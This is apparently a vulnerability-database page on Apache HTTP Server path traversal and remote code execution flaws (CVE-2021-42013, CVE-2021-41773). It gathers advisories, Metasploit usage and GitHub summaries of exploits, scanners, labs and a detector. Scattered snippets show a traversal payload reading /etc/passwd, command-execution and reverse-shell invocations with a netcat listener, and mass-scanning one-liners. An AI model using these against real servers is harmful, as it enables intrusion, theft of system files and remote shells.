Published: 07/10/2021 Updated: 07/11/2023

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 852

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

A NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193) A NULL pointer dereference in httpd allows an unauthenticated remote malicious user to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798) An out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated malicious user to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160) An out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote malicious user to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275) A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated malicious user to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438) While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524) A path transversal flaw was found in Apache 2.4.49. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally this flaw could leak the source of interpreted files like CGI scripts. (CVE-2021-41773) A path transversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013)

Vulnerable Product	Search on Vulmon	Subscribe to Product
apache http server 2.4.49
apache http server 2.4.50
fedoraproject fedora 34
fedoraproject fedora 35
oracle instantis enterprisetrack 17.1
oracle instantis enterprisetrack 17.2
oracle instantis enterprisetrack 17.3
oracle jd edwards enterpriseone tools
oracle secure backup
netapp cloud backup -

A NULL pointer dereference was found in Apache httpd mod_h2 The highest threat from this flaw is to system integrity (CVE-2021-33193) A NULL pointer dereference in httpd allows an unauthenticated remote attacker to crash httpd by providing malformed HTTP requests The highest threat from this vulnerability is to system availability (CVE-2021-347 ...

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2450 was insufficient An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives If files outside of these directories are not protected by the usual default configuration "require all denied", these requests ca ...

On October 5, 2021 and October 7, 2021, the Apache Software Foundation released two security announcements for the Apache HTTP Server that disclosed the following vulnerabilities: CVE-2021-41524: Null Pointer Dereference Vulnerability CVE-2021-41773: Path Traversal and Remote Code Execution Vulnerability CVE-2021-42013: Path Traversal and Remote ...

Apache version 2450 remote code execution exploit that leverages a traversal as identified in CVE-2021-42013 Written in C ...

This is another variant of the Apache HTTP server version 2450 remote code execution exploit ...

This Metasploit module exploits an unauthenticated remote code execution vulnerability which exists in Apache version 2449 (CVE-2021-41773) If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled, it can be used to execute arbitrary commands This vulnerability has been reintroduced ...

Apache HTTP Server version 2450 suffers from path traversal and code execution vulnerabilities ...

Apache HTTP Server version 2450 remote code execution exploit ...

This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2449 (CVE-2021-41773) If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution) This vulnerab ...

This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2449 (CVE-2021-41773) If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution) This vulner ...

oss-sec mailing list archives   By Date By Thread </form>    Re: CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2449 and 2450 (incomplete fix of CVE-202 ...

oss-sec mailing list archives   By Date By Thread </form>    CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2449 and 2450 (incomplete fix of CVE-2021-41 ...

This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).

msf > use exploit/multi/http/apache_normalize_path_rce
msf exploit(apache_normalize_path_rce) > show targets
    ...targets...
msf exploit(apache_normalize_path_rce) > set TARGET < target-id >
msf exploit(apache_normalize_path_rce) > show options
    ...show and set options...
msf exploit(apache_normalize_path_rce) > exploit

This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).

msf > use auxiliary/scanner/http/apache_normalize_path
msf auxiliary(apache_normalize_path) > show actions
    ...actions...
msf auxiliary(apache_normalize_path) > set ACTION < action-name >
msf auxiliary(apache_normalize_path) > show options
    ...show and set options...
msf auxiliary(apache_normalize_path) > run

This exploit is based on a few CVE vulnerabilities affecting Apache 2.4.49. We use URL-encoded characters to access certain files or otherwise restricted resources on the server. Possible RCE on certain systems as well.

Apache Path Traversal Exploit This exploit is based on a few CVE vulnerabilities affecting Apache 2449 We use URL-encoded characters to access certain files or otherwise restricted resources on the server Possible RCE on certain systems as well Affected CVEs CVE-2021-41773 A flaw was found in a change made to path normalization in Apache HTTP Server 2449 An attacker c

compsec30020212022 ##Introduction This is a metasploit module designed to exploit CVE 2021-42013 This only supports RCE, not path traversal #Running -set rhosts and rport -set wanted payload -run exploit

cve-2021-42013 Apache 2450 Path traversal vulnerability Follow Youtube Twitter Telegram Vulnmachinescom

CVE-2021-41773 Usage docker-compose up --build vuln-server-no-cgid python no-cgid/exploitpy docker-compose up --build vuln-server-cgid-sh python cgid-sh/exploitpy CVE-2021-41773とは？ CVE-2021-41773 Apache HTTP Server 2449のディレクトリトラバーサルの脆弱性。Require all denied�

Includes Security Testing detail of Docker Container

Container-Security (Docker & Kubernetes) Docker: OWASP Top 10 1: Host OS Vulnerabilities If Host OS have vulnerabilities, attacker can use it to gain access to containers and apps running inside them Resolution: Regular patching of host OS, Usage of IDS, Firewall, Implement strict access controls CVE-2021-42013 (Path Traversal + RCE + Reverse Shell Attack) An at

Some docker images to play with CVE-2021-41773 and CVE-2021-42013

CVE-2021-41773-Playground Some docker images to play with CVE-2021-41773 and CVE-2021-42013 run docker compose up -d to spin up all the containers Servers will run on ports 8080, 8081, 8082, and 8083 8080 contains an Apache 2449 with CGI disabled 8081 contains an Apache 2449 with CGI enabled 8082 contains an Apache 2450 with CGI disabled 8083 contains an Apache 24

Apache (Linux) CVE-2021-41773/2021-42013 Mass Vulnerability Checker Automatic Mass Tool for checking vulnerability in Apache (Linux) 2449/50Using GNU Parallel You must have parallel for running this tool Install Parallel Linux : command # apt-get install parallel -y Windows : You can install WSL (windows subsystem linux) then do install like linuxif you want use windows, i

Legal Disclaimer This project is done for educational and ethical testing purposes only Attacking targets without prior mutual consent is illegal It is the end user's responsibility to obey all applicable local, state and federal laws Developers assume no liability and are not responsible for any misuse or damage caused by this program Introduction Welcome to our demo

Exploit CVE-2021-41773 and CVE-2021-42013

Exploiting CVE-2021-41773 and CVE-2021-42013 Overview This repository focuses on exploiting two vulnerabilities in Apache HTTPD: CVE-2021-41773 and CVE-2021-42013 These CVEs represent path traversal vulnerabilities that can potentially lead to file mapping and remote code execution on Apache HTTPD servers For in-depth information about these CVEs, including the underlying fla

test

Exploit: Apache HTTP Server 2450 - Remote Code Execution (RCE) (2) Credits: Ash Daulton & cPanel Security Team Date: 24/07/2021 Exploit Author: TheLastVvVcom Vendor Homepage: apacheorg/ Version: Apache 2450 with CGI enable Tested on : Debian 51028 CVE : CVE-2021-42013 #!/bin/bash echo 'PoC CVE-2021-42013 reverse shell Apache 2450 with CGI'

Exploit created in python3 to exploit known vulnerabilities in Apache web server (CVE-2021-41773, CVE-2021-42013)

Apache-CVEs Exploit created in python3 to exploit known vulnerabilities in Apache web server (CVE-2021-41773, CVE-2021-42013) What's apache The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows The goal of this project is to provide a secure, efficient and extensible server th

CVE-2021-42013-exp

CVE-2021-42013 CVE-2021-42013-exp

Project Title Apache HTTP Server 2450 - Local File Inclusion (LFI) & Remote Code Execution (RCE) Description A python3 script for the CVE-2021-42013 - Apache HTTP Server 2450 LFI & RCE RCE requires cgi-bin to be enabled Getting Started Executing program LFI python3 apache_2450py -t apachehack/ -lfi /etc/passwd

CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Path Traversal or Remote Code Execution vulnerabilities in Apache 2.4.49 and 2.4.50

Dockerisation d'une Vulnérabilité : cve-2021-42013 Ce projet vise à dockeriser une vulnérabilité spécifique en utilisant Docker L'objectif est de créer un environnement isolé dans lequel la vulnérabilité peut être exploitée et testée de manière sécurisée Ap

Python script to find PoCs for a given list of CVEs

PoC-Fetcher Description This python script accepts comma separated CVEs and returns a list of POCs for the entered CVEs Usage Enter comma separated CVEs as input The script fetches the POCs from the Github repository nomi-sec Sample Input Enter the CVEids : CVE-2021-41773,CVE-2022-0219 Sample Output CVE-2021-41773 :

githubcom/geeksonsecurity/vuln-web-apps githubcom/Ph0rse/Awesome-XSS vulnwebcom/ brutelogiccombr/knoxsshtml githubcom/tutorial0/testphp_vulns DVWA 9001 githubcom/digininja/DVWA nodegoat 9003 githubcom/OWASP/NodeGoat webgoat 9004 tuonilabswordpresscom/2016

CVE-2021-42013 - Apache 2.4.50

Apache HTTP Server 2450 LFI & RCE A python3 script for the CVE-2021-42013 - Apache HTTP Server 2450 LFI & RCE RCE requires cgi-bin to be enabled Getting Started Executing program LFI python3 apache_2450py -t apachehack/ -lfi /etc/passwd RCE python3 apache_2450py -t apachehack/ -rce whoami

CVE-2021-42013 Apache 2450 vulnerability

Apache 2450 - Path Traversal or Remote Code Execution cve-2021-42013py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2450 Vulnerable instance of Docker is provided to get your hands dirty on CVE-2021-42013 If CGI-BIN is enabled than, we can perform Remote Code Execution but not Path Traversal, so "icons&q

CVE-2021-41773 | CVE-2021-42013 Exploit Tool (Apache/2.4.49-2.4.50)

Exploit for CVE-2021-41773 and CVE-2021-42013 Path traversal attack and RCE in Apache/2449-2450 Features -> Take a list of urls -> Works for both CGI and non-CGI -> Works for Apache/2449 - 2450 Usage $ git clone githubcom/CalfCrusher/Path-traversal-RCE-Apache-2449-2450-Exploit $ cd Path-traversal-RCE-Apache-2449-2450-Exploit &am

CVE-2021-42013 Vulnerability Scanner This Python script checks for the Remote Code Execution (RCE) vulnerability (CVE-2021-42013) in Apache 2.4.50.

CVE-2021-42013 Vulnerability Scanner This Python script checks for the Remote Code Execution (RCE) vulnerability (CVE-2021-42013) in Apache 2450 Introduction This script is designed to help identify if a server is vulnerable to the CVE-2021-42013 RCE vulnerability in Apache 2450 It checks the server's response headers to determine if the vulnerability exists and expl

CVE-2021-42013-ApacheRCE

Apache HTTP Server 2.4.50 - RCE Lab

CVE-2021-42013-LAB Apache HTTP Server 2450 - RCE Lab exploitsh :- githubcom/jas9reet/CVE-2021-42013-LAB/blob/main/exploitsh Usage docker pull jas9reet/cve-2021-42013-lab docker run -dit -p 8088:80 jas9reet/cve-2021-42013-lab Vulnerable Application Access VICTIM-IP-ADDRESS:8088 Exploitation Commands bash exploitsh -u victim-ip:8088 -c "whoami&

A PoC exploit for CVE-2021-42013 - Apache 2.4.49 & 2.4.50 Remote Code Execution

🚨 CVE-2021-42013 - Apache 2449 & 2450 Remote Code Execution 🚨 CVE-2021-42013 builds upon the previously identified vulnerability, CVE-2021-41773 Despite the Apache team's efforts to address CVE-2021-41773 in version 2450, subsequent investigations revealed that the fix fell short of fully mitigating the security risk This vulnerability exploits a path

Exploit for Apache 2.4.50 (CVE-2021-42013)

CVE-2021-42013 C implementation of the infamous Apache 2450 exploit Compiling ~$ gcc cve-2021-42013c -lcurl -o cve-2021-42013 Using ~$ /cve-2021-42013 <host> <exec> Example

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can s…

CVE-2021-41773-Apache-RCE A flaw was found in a change made to path normalization in Apache HTTP Server 2449 An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives If files outside of these directories are not protected by the usual default configuration "require all denied", these requests ca

Przygotowanie Środowiska Docker Desktop link Docker to platforma do tworzenia, uruchamiania i zarządzania kontenerami oprogramowania Kontenery to lekkie, samodzielne jednostki oprogramowania, które zawierają wszystko, czego potrzeba do uruchomienia aplikacji, w tym kod, biblioteki, zależności i pliki konfiguracyjne John the Ripper | Hashcat link Hash od Serwe

Apache HTTP Server v 2.4.49 Docker container, which is vulnerable to CVE-2021-42013

Lab for CVE-2021-42013 Build Docker $ docker build -t cve-2021-42013 Run Docker $ docker run -d cve-2021-42013

Apache HTTP-Server 2.4.49-2.4.50 Path Traversal & Remote Code Execution PoC (CVE-2021-41773 & CVE-2021-42013)

Apache HTTP-Server 2449-2450 Path Traversal & Remote Code Execution Description This is a PoC script for CVE-2021-41773 & CVE-2021-42013 Usage: python3 exploitpy <rhost> <rport> <option> <cmd> | <file-absolute-path> Example: Remote Code Execution py

Usage cve-2021-42013py Check for Path Traversal and Remote Code Execution $ python3 exploitpy -u 1721702 Path Traversal PoC $ python3 exploitpy -u 1721702 -pt Remote Code Execution PoC $ python3 exploitpy -u 1721702 -rce For b

CVE-2021-41773 CVE-2021-42013漏洞批量检测工具

CVE-2021-41773_CVE-2021-42013 CVE-2021-41773 CVE-2021-42013多线程漏洞批量检测与利用工具简介本工具只可用于安全测试，勿用于非法用途！工具定位 CVE-2021-41773 CVE-2021-42013多线程漏洞批量检测与利用工具工具截图提交反馈如有好的建议，以及发现BUG。 GitHub issue: githubcom/inbug-team/CVE-2021-41773

Exploit with integrated shodan search

apache-exploit-CVE-2021-42013 Exploit with integrated shodan search Please use it just in educational purpose!

Apache 2.4.50 Path traversal vulnerability

cve-2021-42013 Apache 2450 Path traversal vulnerability Follow Youtube Twitter Telegram Vulnmachinescom

cve-2021-41773 即 cve-2021-42013 批量检测脚本

cve-2021-41773 and cve-2021-42013 cve-2021-41773 和 cve-2021-42013 批量验证python脚本运行环境：python3 用法：python3 pocpy urltxt urltxt放待检测的url，存在漏洞的url会被写入successtxt 验证内容很简单，get请求发送cgi-bin/%2e/%2e/%2e/%2e/%2e/%2e/%2e/%2e/%2e/etc/passwd就行，但是我用requests发包发现不行，抓包发�

Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE

Apache HTTP Server 2449, 2450 - Path Traversal & RCE Exploit Author: Lucas Souza ls4ssgithubio/ Vendor Homepage: apacheorg/ Version: 2449, 2450 Tested on: 2449, 2450 CVE : CVE-2021-41773, CVE-2021-42013 Credits: Ash Daulton and the cPanel Security Team Usage /PoCsh targetstxt /etc/passwd /PoCsh targetstxt /bin/sh "id"

Metasploit-Framework modules (scanner and exploit) for the CVE-2021-41773 and CVE-2021-42013 (Path Traversal in Apache 2.4.49/2.4.50)

CVE-2021-41773|CVE-2021-42013: Path Traversal Zero-Day in Apache HTTP Server Exploited On October 5, the Apache HTTP Server Project patched CVE-2021-41773, a path traversal and file disclosure vulnerability in Apache HTTP Server, an open-source web server for Unix and Windows that is among the most widely used web servers According to the security advisory, CVE-2021-41773 has

Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE

PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI

CVE-2021-42013_Reverse-Shell PoC CVE-2021-42013 reverse shell Apache 2450 with CGI Usage : chmod -x CVE-2021-42013sh /CVE-2021-42013_reverseshellsh ip:port/ LHOST LPORT More info: chmod -x CVE-2021-42013sh /CVE-2021-42013_reverseshellsh ip:8083 100000000 9999 nc -lvnp 9999

Poc CVE-2021-42013 - Apache 2.4.50 without CGI

CVE-2021-42013 Poc CVE-2021-42013 - Apache 2450 without CGI enable Usage : chmod -x CVE-2021-42013sh /CVE-2021-42013sh ip:port/ /etc/passwd References nvdnistgov/vuln/detail/CVE-2021-42013 cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2021-42013

CVE-2021-42013 - Apache HTTP Server 2450 Cara Menjalankan Lab CVE-2021-42013-Path Traversal Install dan jalankan Docker di PC/Laptop anda Clone github repo ini Pergi ke folder Path Traversal Masukan perintah sebagai berikut docker build -t cve-2021-42013-path-traversal dan docker run --rm -dit -p 8888:80 cve-2021-42013-path-traversal Akses menggunakan browser dengan mengun

apache httpd path traversal checker(CVE-2021-41773 / CVE-2021-42013)

apache httpd path traversal checker 0x00 概述 20211005，网上曝出apache httpd 2449的目录穿越漏洞（cve-2021-41773），可造成任意文件读取（穿越的目录允许被访问，如配置了<Directory />Require all granted</Directory>，默认不允许）或命令执行（rce需开启cgi，默认不包含cgi模块） 20211008，�

Docker container lab to play/learn with CVE-2021-42013

CVE-2021-42013 Introduction It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2450 was insufficient An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives If files outside of these directories are not protected by the usual default configuration "require all denied", these req

Remote Code Execution exploit for Apache servers. Affected versions: Apache 2.4.49, Apache 2.4.50

RCE exploit both for Apache 2449 (CVE-2021-41773) and 2450 (CVE-2021-42013): IMHO only "special" setups will be vulnerable to this RCE Same happens for the "arbitrary file read" exploits you have seen Both CVEs are indeed almost the same path-traversal vulnerability (2nd one is the uncomplete fix for 1st one) Path traversal only work from a mapped URI

cve-2021-42013.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.50

Apache 2450 - Path Traversal or Remote Code Execution CVE-2021-42013py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2450 Vulnerable instance of Docker is provided to get your hands dirty on CVE-2021-42013 If CGI-BIN is enabled than, we can perform Remote Code Execution but not Path Traversal, so "icons&q

Tool check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519

SimplesApachePathTraversal Simples Apache Path Traversal It's a simple tool for test vulnerability Apache Path Traversal blogmrcl0wncom/2021/10/uma-simples-tool-para-apache-pathhtml Autor: MrCl0wn Blog: blogmrcl0wncom GitHub: githubcom/MrCl0wnLab Twitter: twittercom/MrCl0wnLab Email: mrcl0wnlab\@\gma

知识星球《漏洞百出》最新 20条 Topic

最新后续爬虫不在提供服务，每周总结可见【漏洞百出】一周记（211116 ～ 211121）【漏洞百出】一周记（211122 ～ 211128）欢迎关注微信公众号漏洞百出 Topics 20 星球最新20条Topic - 更新于 2021-10-14 10:03:41 作者内容发表时间 chybeta 星球链接: 818888225428842 简要内容: PHP 利用未知

cve-2021-42013.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.50

Lab setup for CVE-2021-41773 (Apache httpd 2.4.49) and CVE-2021-42013 (Apache httpd 2.4.50).

CVE-2021-41773 and CVE-2021-42013 Lab Setup Setup $ git clone githubcom/vulf/CVE-2021-41773_42013 $ cd CVE-2021-41773_42013 cd to the directory of your choice $ docker build -t vuln_apache $ docker run -d vuln_apache NOTE: The httpdconf files are configured to be vulnerable to RCE by default For only Path Traversal, read this

Docker container lab to play/learn with CVE-2021-42013

A Zeek package which raises notices for Path Traversal/RCE in Apache HTTP Server 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013)

CVE-2021-41773 A Zeek package which raises notices for Path Traversal/RCE in Apache HTTP Server 2449 (CVE-2021-41773) and 2450 (CVE-2021-42013) References httpdapacheorg/security/vulnerabilities_24html#CVE-2021-41773 httpdapacheorg/security/vulnerabilities_24html#CVE-2021-42013 blogsonatypecom/apache-servers-actively-exploited-in-wild-importa

Apache (Linux) CVE-2021-41773/2021-42013 Mass Vulnerability Checker

CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited

CVE-2021-41773 CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited Apache HTTP Server CVE-2021-41773 Exploited in the Wild CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2449 and 2450 (incomplete fix of CVE-2021-41773) Shodan oneliner shodan search Apache Server 2449 | awk '{print $1":"$2}' | while

Apache 远程代码执行（CVE-2021-42013）批量检测工具：Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点，发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护，则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本，则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50，而不影响更早版本。

漏洞名称 Apache 远程代码执行（CVE-2021-42013）漏洞描述 Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点，发现 Apache HTTP Server 2450 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射�

These Nmap, Python and Ruby scripts detects and exploits CVE-2021-42013 with RCE and local file disclosure.

CVE-2021-42013 Description This script exploits CVE-2021-42013 to print file or/and execute command This script is available for: Nmap Python Ruby Requirements Python python3 python3 Standard Library Ruby Ruby Ruby Standard Library Install git clone githubcom/mauricelambert/CVE-2021-42013git cd CVE-2021-42013 # Python pip install -r requirementstxt

Apache_path_traversal apache httpd path traversal cve-2021-41773 and cve-2021-42013 allows an attacker to read arbitrary files such as passwd & Remote Code Execution from the vulnerable server file system Vulnrable Version Apache HTTP Server 2449 and 2450 apache_path_traversalpy A python script for check the server is vulnerable or not & use for read the

Web App Government Data Analysis Python Security tools PickleExploit Documentation WebSiteClonerHTTPLogger Documentation WebSiteClonerWebSiteCloner Documentation PyEmailToolsEmail Documentation PyEmailToolsForger Documentation PyEmailToolsImapClient Documentation PyEmailToolsPopClient Documentation PyEmailToolsReader Documentation PyEmailToolsSmtpCli

Advent-of-Cyber-3-2021- [Day 1] Web Exploitation Save The Gifts After finding Santa's account, what is their position in the company? The Boss! After finding McStocker's account, what is their position in the company? Build Manager After finding the account responsible for tampering, what is their position in the company? Mischief Manager What is the received flag whe

CVE-2021-41773 | CVE-2021-42013 Exploit Tool (Apache/2.4.49-2.4.50)

CVE-2021-42013 This is the deployment for Apache 2450 which associates with CVE-2021-42013 using Docker container Description: It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2450 was insufficient An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives If files outside of these dire

Apache httpd RCE A flaw was found in a change made to path normalization in Apache HTTP Server 2449 An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives If files outside these directories are not protected by default configuration "require all denied", these requests can succeed If CGI scri

CVE-2021-41773 This is the deployment for Apache 2449 which associates with CVE-2021-41773 using Docker container Description: A flaw was found in a change made to path normalization in Apache HTTP Server 2449 An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives If files outside of these directorie

WIP: EFed Management System

Read Me The most important thing to note at the moment is that this is an early stage work in progress When I started working on this project (and even at the time of writing this), I have had no professional or academic experience in coding/programming/development I chose an ambitious and challenging project specifically to help me learn to master Python and eventually othe

Vulnerable configuration Apache HTTP Server version 2.4.49/2.4.50

CVE-2021-42013 Vulnerable service Installation Several options: 1 Docker container docker run -d -p 8080:80 12345qwert123456/apache_2_4_50_cve-2021-42013 2 Dockerfile git clone githubcom/12345qwert123456/CVE-2021-42013git cd CVE-2021-42013-Vulnerable-service/2450 docker build -t apache_2_4_50_cve-2021-42013 docker run -d

It's a vulnerability scanner tool for test Apache Path Traversal 👾

Apache Path Traversal Path traversal (software bug) A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder By manipulating variables that reference files with “dot-dot-slash (/)” sequences and its variations or by using absolute file paths, it may be possible to acces

Zerobot malware now shooting for Apache systems

The Register

Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Upgraded threat, time to patch

The Zerobot botnet, first detected earlier this month, is expanding the types of Internet of Things (IoT) devices it can compromise by going after Apache systems. The botnet, written in the Go programming language, is being sold as the malware-as-a-service (MaaS) model and spreads through vulnerabilities in IoT devices and web applications, according to the Microsoft Security Threat Intelligence (MSTIC) team in a report released on Wednesday. Zerobot was first reported on in early December by re...

CVE-2021-42013

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

Mailing Lists

Metasploit Modules

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect